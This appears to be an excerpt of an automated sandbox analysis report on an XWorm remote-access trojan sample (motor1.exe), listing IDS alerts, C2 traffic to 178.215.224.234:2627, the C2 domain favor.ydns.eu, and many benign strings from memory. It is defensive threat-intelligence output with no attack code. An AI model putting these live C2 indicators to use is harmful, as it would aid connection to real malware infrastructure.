Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then sub rsp, 28h	4_2_00007FFD9461B240
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push r14	4_2_00007FFD9469B1E0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 4x nop then mov rcx, qword ptr [rcx+08h]	21_2_00007FFD92791090

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:50025 -> 178.215.224.234:2627
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:50028 -> 178.215.224.234:2627

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: favor.ydns.eu

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49883 -> 178.215.224.234:2627

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: motor1.exe	String found in binary or memory: disponibile all'indirizzo https://www.youtube.com/t/terms. L'Utente accetta di (i) rispettare tutte le leggi, le norme e i regolamenti applicabili e (ii) non accedere o utilizzare i Servizi API di YouTube in modo da violare tali leggi, norme e regolamenti o i equals www.youtube.com (Youtube)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: disponibile all'indirizzo https://www.youtube.com/t/terms. L'Utente accetta di (i) rispettare tutte le leggi, le norme e i regolamenti applicabili e (ii) non accedere o utilizzare i Servizi API di YouTube in modo da violare tali leggi, norme e regolamenti o in modo ingannevole, non etico, falso o fuorviante. equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.youtube.com/t/terms. equals www.youtube.com (Youtube)
Source: motor1.exe	String found in binary or memory: The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a manner that violates such laws, rules, and r equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: Versions of the Software intended for private use (personal license) as well as trial versions may not be used for commercial purposes, with only the following exception: use of any version of the Software to make videos for monetization on YouTube or similar services shall not constitute breach of this agreement as long as the description attached to such videos includes a statement to the effect that the video was created using the Software and includes a link to https://www.movavi.com/. equals www.youtube.com (Youtube)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: YOUTUBE API. Some Software, e.g., Movavi Video Editor and Movavi Slideshow Maker, uses the YouTube API under the terms of YouTube service conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a manner that violates such laws, rules, and regulations, or in a manner that is deceptive, unethical, false, or misleading. equals www.youtube.com (Youtube)
Source: motor1.exe	String found in binary or memory: ce conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a manner that violates s equals www.youtube.com (Youtube)
Source: motor1.exe	String found in binary or memory: eshow Maker, uses the YouTube API under the terms of YouTube service conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: gral de ces conditions d'utilisation est disponible sur https://www.youtube.com/t/terms. Vous acceptez (i) de vous conformer equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: ndigen Text dieser Nutzungsbedingungen finden Sie unter https://www.youtube.com/t/terms. Sie erkl equals www.youtube.com (Youtube)
Source: motor1.exe	String found in binary or memory: s of YouTube service conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a mann equals www.youtube.com (Youtube)

Source: global traffic

DNS traffic detected: DNS query: favor.ydns.eu

Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: HTTP://WWW.MPEGLA.COM.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.css
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.jpg
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://WWW.MPEGLA.COM/.
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://ffmpeg.org).
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://mp3licensing.com.
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://mp3licensing.com/.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://narwhaljs.org)
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://opensource.org/licenses/BSD-3-Clause
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://opensource.org/licenses/BSD-3-Clause.
Source: AddInProcess32.exe, 00000005.00000002.4839943151.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://userguide.icu-project.org/strings/properties
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.boost.org/LICENSE_1_0.txt
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.boost.org/LICENSE_1_0.txt.
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.ffmpeg.org)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.ffmpeg.org).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.ffmpeg.org/).
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://www.mpegla.com.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000004.00000002.2544982962.00007FFD94832000.00000004.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601476755.00007FFD929C1000.00000004.00000001.01000000.0000002C.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000004.00000002.2544982962.00007FFD94832000.00000004.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601476755.00007FFD929C1000.00000004.00000001.01000000.0000002C.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: motor1.exe, 00000015.00000002.2601476755.00007FFD929C1000.00000004.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityh
Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10704
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#clear
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#console-namespace
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#count
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#count-map
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#countreset
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#table
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://crbug.com/v8/7848
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://crbug.com/v8/8520
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
